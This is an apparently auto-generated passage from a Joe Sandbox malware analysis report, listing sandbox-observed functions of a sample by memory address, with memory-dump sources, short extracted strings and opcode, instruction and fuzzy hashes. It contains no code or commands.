                                                                      • Opcode ID: 055555868ad1deda06c9e15c5781c06490c9bd057e0ad58b6c6613312fdad089
                                                                      • Instruction ID: 0f0e3c153b92b32ef7d5cbdf679a1fda690449e09e499981e4237834940c595d
                                                                      • Opcode Fuzzy Hash: 055555868ad1deda06c9e15c5781c06490c9bd057e0ad58b6c6613312fdad089
                                                                      • Instruction Fuzzy Hash: 2E51B34FB4956276E21133FCF4099ED5BE8EFD5276B094ABBD14EC91834C086C8583E5

                                                                      Executed Functions

                                                                      Function 00007FFAAB440D4C Relevance: 6.5, Strings: 5, Instructions: 260COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000001E.00000002.1731421929.00007FFAAB440000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB440000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_30_2_7ffaab440000_MQYzEFytUKABjmoxvNTPTwUrcL.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: "93$5[_H$b43$r63$r63
                                                                      • API String ID: 0-3569791616
                                                                      • Opcode ID: f9636b9208128acc0df1091c940060e5d031f7a45fc28193c78ad61db30a5e4c
                                                                      • Instruction ID: 6b2771b24899e3107e201017e1f9139e3884d33e6cf7835a93c7be9a073ffec5
                                                                      • Opcode Fuzzy Hash: f9636b9208128acc0df1091c940060e5d031f7a45fc28193c78ad61db30a5e4c
                                                                      • Instruction Fuzzy Hash: 4C911BB6A18A899FE749EB68C8657E97FE1FB96354F4040BBC04DD73E2CA781424C740
                                                                      Function 00007FFAAB4408D0 Relevance: .2, Instructions: 172COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000001E.00000002.1731421929.00007FFAAB440000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB440000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_30_2_7ffaab440000_MQYzEFytUKABjmoxvNTPTwUrcL.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 8cbe65a97567c115e1146222241288e30c5ef19554915f3a78f7edfbfb2451e3
                                                                      • Instruction ID: 998911367f09f49b53b758e15389222f43d458d5cc4ba2ade463c100577cf6f7
                                                                      • Opcode Fuzzy Hash: 8cbe65a97567c115e1146222241288e30c5ef19554915f3a78f7edfbfb2451e3
                                                                      • Instruction Fuzzy Hash: CB412C3264C9159FD714FB6CE4889F87BE0EF8632170544BBD08ACB163DA10AC8183C1
                                                                      Function 00007FFAAB44090D Relevance: .2, Instructions: 150COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000001E.00000002.1731421929.00007FFAAB440000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB440000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_30_2_7ffaab440000_MQYzEFytUKABjmoxvNTPTwUrcL.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 82f84205c998a91759e78ce480a47077e1d3d55dc7a2c9c2d362be0e389dbecc
                                                                      • Instruction ID: f5c1322583cfba9b9866371597a8507b6d23c3e270ebdb61befd0f6d434a5d33
                                                                      • Opcode Fuzzy Hash: 82f84205c998a91759e78ce480a47077e1d3d55dc7a2c9c2d362be0e389dbecc
                                                                      • Instruction Fuzzy Hash: 3D411562A4E6966FE714B3BCE09A9F87B90EF85365B1444BAD04EC71A3CD18688182C5
                                                                      Function 00007FFAAB440908 Relevance: .1, Instructions: 118COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000001E.00000002.1731421929.00007FFAAB440000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB440000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_30_2_7ffaab440000_MQYzEFytUKABjmoxvNTPTwUrcL.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 0cc6d291224cff623f15b76e085ee268e028e3e3f7966c47599f22330fc3e73a
                                                                      • Instruction ID: 713c8b5414808e1ca5e637a988efc28f32dc33321c35014708da64902c1609a9
                                                                      • Opcode Fuzzy Hash: 0cc6d291224cff623f15b76e085ee268e028e3e3f7966c47599f22330fc3e73a
                                                                      • Instruction Fuzzy Hash: 4721D53130D8184FE768EB0CE889DB973D1FB5A32170101BAE58EC7136E911EC9287C1
                                                                      Function 00007FFAAB440960 Relevance: .1, Instructions: 116COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000001E.00000002.1731421929.00007FFAAB440000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB440000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_30_2_7ffaab440000_MQYzEFytUKABjmoxvNTPTwUrcL.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 1165f8224d19f09a326d464802a5595bee9f7057af467737fd78021976286dad
                                                                      • Instruction ID: f9c891b1d5d88479bb50cfb491c18356cd19158c5ee293bd85599b10bc92c36e
                                                                      • Opcode Fuzzy Hash: 1165f8224d19f09a326d464802a5595bee9f7057af467737fd78021976286dad
                                                                      • Instruction Fuzzy Hash: BB310662A1EA566FF358B77CE44A9F977D1EF85365B1444BEE00FC32A3CC186C824285
                                                                      Function 00007FFAAB440998 Relevance: .1, Instructions: 108COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000001E.00000002.1731421929.00007FFAAB440000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB440000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_30_2_7ffaab440000_MQYzEFytUKABjmoxvNTPTwUrcL.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 7580d5ba074a1f581ee43f41c4a53d9261ec60e2170f9647a96cf945cc8c6c7f
                                                                      • Instruction ID: d83995244fb46932ddd95af0c3b834fb0f89b0b2e47a3c094e961f2313e763d1
                                                                      • Opcode Fuzzy Hash: 7580d5ba074a1f581ee43f41c4a53d9261ec60e2170f9647a96cf945cc8c6c7f
                                                                      • Instruction Fuzzy Hash: B0312B60A1AA595FE758F738C449AB977D1EF99354B1440BDE40EC32F3CC18A8868391
                                                                      Function 00007FFAAB44116D Relevance: .1, Instructions: 108COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000001E.00000002.1731421929.00007FFAAB440000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB440000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_30_2_7ffaab440000_MQYzEFytUKABjmoxvNTPTwUrcL.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: f7581ba50d8bf5a5e8a33366756ad72479b23c9325bebdc277295d04abf4a5a1
                                                                      • Instruction ID: 7d34355eaf1a39b8d5687ebda69f1af514426042ad7c80dc9f6bc05c1563a545
                                                                      • Opcode Fuzzy Hash: f7581ba50d8bf5a5e8a33366756ad72479b23c9325bebdc277295d04abf4a5a1
                                                                      • Instruction Fuzzy Hash: 2331E73190DA4A8FDB45EB78C8559F97FF0FF5B310B0445BAC00EC71A2DA28A855C781
                                                                      Function 00007FFAAB440C25 Relevance: .1, Instructions: 93COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000001E.00000002.1731421929.00007FFAAB440000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB440000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_30_2_7ffaab440000_MQYzEFytUKABjmoxvNTPTwUrcL.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 48148860a1ae8afcedde4ea5b60a105f365ca95fc5d37d7317ebd16ff7e9b92f
                                                                      • Instruction ID: 2212d38230da4f1d7fae7271caea3522eb0aa2be9b1ea3a1a2b3d9066121f305
                                                                      • Opcode Fuzzy Hash: 48148860a1ae8afcedde4ea5b60a105f365ca95fc5d37d7317ebd16ff7e9b92f
                                                                      • Instruction Fuzzy Hash: E3312476A0D64ADFE301AB78D8042EC7FB0EF82351F0485B6D04DCA2D3D93829A987D1
                                                                      Function 00007FFAAB4469E3 Relevance: .1, Instructions: 68COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000001E.00000002.1731421929.00007FFAAB440000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB440000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_30_2_7ffaab440000_MQYzEFytUKABjmoxvNTPTwUrcL.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 470cbebc6b45b20f1d01d529ba67c4e675e11edf36e9cd9cf3159435a9897069
                                                                      • Instruction ID: 9d33fe02933ef81062cb2b2e693c4ec1db6f0b905ee5ef5bc2fe55fbefcc6e93
                                                                      • Opcode Fuzzy Hash: 470cbebc6b45b20f1d01d529ba67c4e675e11edf36e9cd9cf3159435a9897069
                                                                      • Instruction Fuzzy Hash: B221FC30D18969CFEB65DB04C454BE9B3E1FB59314F1485EAC40EE3291CB79AE88CB80
                                                                      Function 00007FFAAB441280 Relevance: .1, Instructions: 65COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000001E.00000002.1731421929.00007FFAAB440000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB440000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_30_2_7ffaab440000_MQYzEFytUKABjmoxvNTPTwUrcL.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: a16bf86e1e83a34532d8c2075def0ecf86f01063643b31862acb4652bcd114f7
                                                                      • Instruction ID: bbf08e6e2542b0c5082427f64f9ff9315eeff911a5bb6ce7a6577ab7d2323aca
                                                                      • Opcode Fuzzy Hash: a16bf86e1e83a34532d8c2075def0ecf86f01063643b31862acb4652bcd114f7
                                                                      • Instruction Fuzzy Hash: 6B110D62A09A8E4BF754AB3888597FA7AC1DF5A390F40057DE44FC22D3CC1C58584381
                                                                      Function 00007FFAAB446F3D Relevance: .1, Instructions: 57COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000001E.00000002.1731421929.00007FFAAB440000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB440000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_30_2_7ffaab440000_MQYzEFytUKABjmoxvNTPTwUrcL.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: a20c2f16be8a5cf93c1741d7f0eecc350c1d05bc538523981da2460913dae605
                                                                      • Instruction ID: 239fc04a3d08b4a6a2dd6a6ab780083395807f37b6dc89078ff0fd2797dbc660
                                                                      • Opcode Fuzzy Hash: a20c2f16be8a5cf93c1741d7f0eecc350c1d05bc538523981da2460913dae605
                                                                      • Instruction Fuzzy Hash: B5117030D1E9098BEB54EB18D8466F976D1FF56340F1041B9D84FD32A2ED38686946C2
                                                                      Function 00007FFAAB440C38 Relevance: .1, Instructions: 54COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000001E.00000002.1731421929.00007FFAAB440000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB440000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_30_2_7ffaab440000_MQYzEFytUKABjmoxvNTPTwUrcL.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 7d2bb3cf7ef24b03d8655264155837fbce6f2c0c7af57cb7afabf7b278c7a61a
                                                                      • Instruction ID: 958d5a679b9930a30a02119475dfa8c50176f44c802e02bc9f22e0f0c4c3c54e
                                                                      • Opcode Fuzzy Hash: 7d2bb3cf7ef24b03d8655264155837fbce6f2c0c7af57cb7afabf7b278c7a61a
                                                                      • Instruction Fuzzy Hash: 40119E35A0D689DFE7069B68C8401D97FB0EF83251F1485B7C489DB2A2E538266987D1
                                                                      Function 00007FFAAB440C40 Relevance: .0, Instructions: 48COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000001E.00000002.1731421929.00007FFAAB440000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB440000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_30_2_7ffaab440000_MQYzEFytUKABjmoxvNTPTwUrcL.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 8605c5cd2ed30e922d213fdc2c823533a094b43cd86ef09129ed663d9de93910
                                                                      • Instruction ID: 034a2b631499da161201492a205d8ecd21f19c34d31f12b54a448c79055f56c8
                                                                      • Opcode Fuzzy Hash: 8605c5cd2ed30e922d213fdc2c823533a094b43cd86ef09129ed663d9de93910
                                                                      • Instruction Fuzzy Hash: 1E11AC35A0D289DFE7029B68C4401D97FB0EF82250F1485B6C449CB2A2D63826698780
                                                                      Function 00007FFAAB446F83 Relevance: .0, Instructions: 46COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000001E.00000002.1731421929.00007FFAAB440000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB440000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_30_2_7ffaab440000_MQYzEFytUKABjmoxvNTPTwUrcL.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 959c2e8e5d2dc8fb46f73c2d5058c5887e0954838144e04cd013255cc59b26f4
                                                                      • Instruction ID: 362b00be108e3da212128b5bf4222bc6b77c146f4163b3853cabbd2e03b6f199
                                                                      • Opcode Fuzzy Hash: 959c2e8e5d2dc8fb46f73c2d5058c5887e0954838144e04cd013255cc59b26f4
                                                                      • Instruction Fuzzy Hash: CB01E130A1950ACFEB54EB28D455AF872D1EF56340F1180B5D84FC72A3ED28A8694685
                                                                      Function 00007FFAAB440C48 Relevance: .0, Instructions: 42COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000001E.00000002.1731421929.00007FFAAB440000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB440000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_30_2_7ffaab440000_MQYzEFytUKABjmoxvNTPTwUrcL.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 0fb33bb0b3f17d59341ab15ad9c1b10f822d6eba7bcab151df063c23b6d1dc84
                                                                      • Instruction ID: dd3d352653893482c2165113a11650171e4042ff6dcd5e90ed65bf565dd30d71
                                                                      • Opcode Fuzzy Hash: 0fb33bb0b3f17d59341ab15ad9c1b10f822d6eba7bcab151df063c23b6d1dc84
                                                                      • Instruction Fuzzy Hash: 9B016935A0D389DFE706DB68C8441D9BFB0EF43340F1485F6C449DB2A2EA386A68C781
                                                                      Function 00007FFAAB446FE1 Relevance: .0, Instructions: 39COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000001E.00000002.1731421929.00007FFAAB440000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB440000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_30_2_7ffaab440000_MQYzEFytUKABjmoxvNTPTwUrcL.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: d07b5b26c3a0c20170229a639b96947a79ab10b6de91b9e0bc2cb91a825951a1
                                                                      • Instruction ID: d205cd1d13fa8f7ca909effce5fe6d1af4686036fd923160bdf71b7e2847470a
                                                                      • Opcode Fuzzy Hash: d07b5b26c3a0c20170229a639b96947a79ab10b6de91b9e0bc2cb91a825951a1
                                                                      • Instruction Fuzzy Hash: 8301363091941DCBEB64EB14D8456F873A1FF56341F1080F9D84FD32A2DD386DE98A85
                                                                      Function 00007FFAAB44701E Relevance: .0, Instructions: 33COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000001E.00000002.1731421929.00007FFAAB440000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB440000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_30_2_7ffaab440000_MQYzEFytUKABjmoxvNTPTwUrcL.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 1251d3e82537e973c7b5756e56e94c0f5eb721292431cc287cbd807b10bf8afd
                                                                      • Instruction ID: 96d0a8341401b098fa60ff834e963995c1608b28686d2c73499279b7e334c14f
                                                                      • Opcode Fuzzy Hash: 1251d3e82537e973c7b5756e56e94c0f5eb721292431cc287cbd807b10bf8afd
                                                                      • Instruction Fuzzy Hash: CDF0D03091A509CBEA54EB14D4456F93391EF56380F1081B9DC8FD32F3DD286DAD4685
                                                                      Function 00007FFAAB440B9A Relevance: .0, Instructions: 15COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000001E.00000002.1731421929.00007FFAAB440000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB440000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_30_2_7ffaab440000_MQYzEFytUKABjmoxvNTPTwUrcL.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: ea49223fd1a816fd1b362e084a2150523c639c30c7cf8a22846f769d5ebcd9de
                                                                      • Instruction ID: 7d708afda7aca91cb952d9e2c6bb4e175183190131fa63e7ece1ac36bf97878f
                                                                      • Opcode Fuzzy Hash: ea49223fd1a816fd1b362e084a2150523c639c30c7cf8a22846f769d5ebcd9de
                                                                      • Instruction Fuzzy Hash: 4ED012345A68098FC654E728D9954A4BA90FB0A214F8901D0D40DC7161D35698A4C741
                                                                      Function 00007FFAAB4406A5 Relevance: .0, Instructions: 13COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000001E.00000002.1731421929.00007FFAAB440000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB440000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_30_2_7ffaab440000_MQYzEFytUKABjmoxvNTPTwUrcL.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 492715d0345259cd22954f87a1d169ce04240646543a6308cca8d53054399d7f
                                                                      • Instruction ID: f428fbc6977034d030d1d6b48820445d26cb1bb16331a2e643f6f0e8d3f511e8
                                                                      • Opcode Fuzzy Hash: 492715d0345259cd22954f87a1d169ce04240646543a6308cca8d53054399d7f
                                                                      • Instruction Fuzzy Hash: 70C08C01E0F40B83F800332ED4020ECA9005BCB290FD08032C80F402E59C0E20FD01C6
                                                                      Function 00007FFAAB4412B8 Relevance: .0, Instructions: 12COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000001E.00000002.1731421929.00007FFAAB440000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB440000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_30_2_7ffaab440000_MQYzEFytUKABjmoxvNTPTwUrcL.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: d4ba06150ed00881c4cf65a6fed42ef92c57d35f82581e5d446d3181800b7739
                                                                      • Instruction ID: 34169a35e06d53277d4e23f7ee869349ee897fcf519546a0bfc5e1c814ba86a4
                                                                      • Opcode Fuzzy Hash: d4ba06150ed00881c4cf65a6fed42ef92c57d35f82581e5d446d3181800b7739
                                                                      • Instruction Fuzzy Hash: CEC04C345519498FDA48EB29C88595477A0FB1A315BD50090E40DC7171D659DCD5C781
                                                                      Function 00007FFAAB443416 Relevance: .0, Instructions: 10COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000001E.00000002.1731421929.00007FFAAB440000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB440000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_30_2_7ffaab440000_MQYzEFytUKABjmoxvNTPTwUrcL.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 47ad034989c1a3eea3b904165392716695a8c26fd4a9666c838716bdbcd76832
                                                                      • Instruction ID: 19581d008677a23d0636526c2e64fa8c06b67a6feed9da2489031e7c84fc04d6
                                                                      • Opcode Fuzzy Hash: 47ad034989c1a3eea3b904165392716695a8c26fd4a9666c838716bdbcd76832
                                                                      • Instruction Fuzzy Hash: F4C08C02F48C6A83F2146228C02067F04429F80248F8044B0E00EC63C6CC0C9B0102C2
                                                                      Function 00007FFAAB443A81 Relevance: .0, Instructions: 8COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000001E.00000002.1731421929.00007FFAAB440000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB440000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_30_2_7ffaab440000_MQYzEFytUKABjmoxvNTPTwUrcL.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 073d9c353f8b61f72971ab2a2759b3774695763181e287a262662aa7889bbd8c
                                                                      • Instruction ID: fc3dbd6b031368a8f4210c7d7a181a04218cece0ed456d64e22340746e301747
                                                                      • Opcode Fuzzy Hash: 073d9c353f8b61f72971ab2a2759b3774695763181e287a262662aa7889bbd8c
                                                                      • Instruction Fuzzy Hash: 0AC02B10C4D004C3F3294330C4011FE31401F5A300F05C172C00F52091DE2854281180
                                                                      Function 00007FFAAB4406C8 Relevance: .0, Instructions: 8COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000001E.00000002.1731421929.00007FFAAB440000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB440000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_30_2_7ffaab440000_MQYzEFytUKABjmoxvNTPTwUrcL.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 14727f7c39f492ae433c84a642adf36ffcae6a728a13de46db1a285b7774d304
                                                                      • Instruction ID: 1401085b7badf1dab677a00a7fd944e1cebbd174fdf7aa36566134bf2590a3a9
                                                                      • Opcode Fuzzy Hash: 14727f7c39f492ae433c84a642adf36ffcae6a728a13de46db1a285b7774d304
                                                                      • Instruction Fuzzy Hash: ADB01200C5740F43E804337E48420E478505B4B140FC04070D80E40195984E10BC02C3

                                                                      Non-executed Functions

                                                                      Function 00007FFAAB4409B0 Relevance: 5.2, Strings: 4, Instructions: 194COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000001E.00000002.1731421929.00007FFAAB440000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB440000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_30_2_7ffaab440000_MQYzEFytUKABjmoxvNTPTwUrcL.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: c9$!k9$"s9$#{9
                                                                      • API String ID: 0-1692736845
                                                                      • Opcode ID: d51d87f4bf8dc3cd4ccfdd7a9390f68007acb6a097157c88452ed5e5a7d49aa0
                                                                      • Instruction ID: 0e1940acc0a3f8b1bc9895f3ce5b0a10781f4cda516efab16a0242bd87582379
                                                                      • Opcode Fuzzy Hash: d51d87f4bf8dc3cd4ccfdd7a9390f68007acb6a097157c88452ed5e5a7d49aa0
                                                                      • Instruction Fuzzy Hash: 9951F58FB4956376E21133BDF0099EC5BE8EFD1376B094AB7D14EC91834D08689982E5

                                                                      Executed Functions

                                                                      Function 00007FFAAB470D4C Relevance: 6.5, Strings: 5, Instructions: 258COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000001F.00000002.1809446641.00007FFAAB470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB470000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_31_2_7ffaab470000_jW5TA1J9Z1.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: "93$5X_H$b43$r63$r63
                                                                      • API String ID: 0-1044410338
                                                                      • Opcode ID: eeb5387a95ce7d7a0eaf31afd1324c67081c73a3fa35f45d5db69d6f2631fb34
                                                                      • Instruction ID: f7d142656e0096ed55f545ef982332f5b023d895bd0d9e00ed9a0dc14c98f385
                                                                      • Opcode Fuzzy Hash: eeb5387a95ce7d7a0eaf31afd1324c67081c73a3fa35f45d5db69d6f2631fb34
                                                                      • Instruction Fuzzy Hash: 939114B6A09A8D8FE788DB68C8657A97FF1FB96350F4040AAC00DD73E2CB781404C780
                                                                      Function 00007FFAAB4A1715 Relevance: 4.6, Strings: 3, Instructions: 892COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000001F.00000002.1809446641.00007FFAAB4A1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB4A1000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_31_2_7ffaab4a1000_jW5TA1J9Z1.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: I$X6$r63
                                                                      • API String ID: 0-1713481558
                                                                      • Opcode ID: a5e47c892e6ea73e37241ba3d1bafe0fcac8274f45ffbd96bb601413bfdb4f19
                                                                      • Instruction ID: e1e96bb58d5ba0dbe9964d8f159918e17f06712e8ab8f522b3f941fbaccab487
                                                                      • Opcode Fuzzy Hash: a5e47c892e6ea73e37241ba3d1bafe0fcac8274f45ffbd96bb601413bfdb4f19
                                                                      • Instruction Fuzzy Hash: 94126C6191E7964FE31D9B2888451B57BE1EF93355F0882BED4CFC70A7D918A84B83C1
                                                                      Function 00007FFAAB4A1958 Relevance: 1.6, Strings: 1, Instructions: 318COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000001F.00000002.1809446641.00007FFAAB4A1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB4A1000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_31_2_7ffaab4a1000_jW5TA1J9Z1.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: r63
                                                                      • API String ID: 0-1294201789
                                                                      • Opcode ID: 40ca66ea15ec65ea38ada6361d6a05226d75df3bca349f6e334f0e0089d144de
                                                                      • Instruction ID: c53fc37b00cb1fe9f0b137e74e797df2faeb45bd5fbdf6effecd74176429ecc5
                                                                      • Opcode Fuzzy Hash: 40ca66ea15ec65ea38ada6361d6a05226d75df3bca349f6e334f0e0089d144de
                                                                      • Instruction Fuzzy Hash: DE819C62E2D65A4BE31C4A2D4C420B273D6EBC7292B18C23DD9CFC7197DC18E84B42C0
                                                                      Function 00007FFAAB4A2CB6 Relevance: 1.4, Strings: 1, Instructions: 120COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000001F.00000002.1809446641.00007FFAAB4A1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB4A1000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_31_2_7ffaab4a1000_jW5TA1J9Z1.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: r63
                                                                      • API String ID: 0-1294201789
                                                                      • Opcode ID: 59513d3fe526dfde50dcc6fd617e717bf72eda240857d6a21afdfd2635da4136
                                                                      • Instruction ID: b6ce08a51f5e717e9871bd5dc703b0dec479119baf55f9bfde4f5b808e26b1d0
                                                                      • Opcode Fuzzy Hash: 59513d3fe526dfde50dcc6fd617e717bf72eda240857d6a21afdfd2635da4136
                                                                      • Instruction Fuzzy Hash: 3D41A332A0891ACFDB58E758C495BB977A2FB99750F0442BDD00ED72D6CE286C8987C1
                                                                      Function 00007FFAAB4A5494 Relevance: 1.3, Strings: 1, Instructions: 70COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
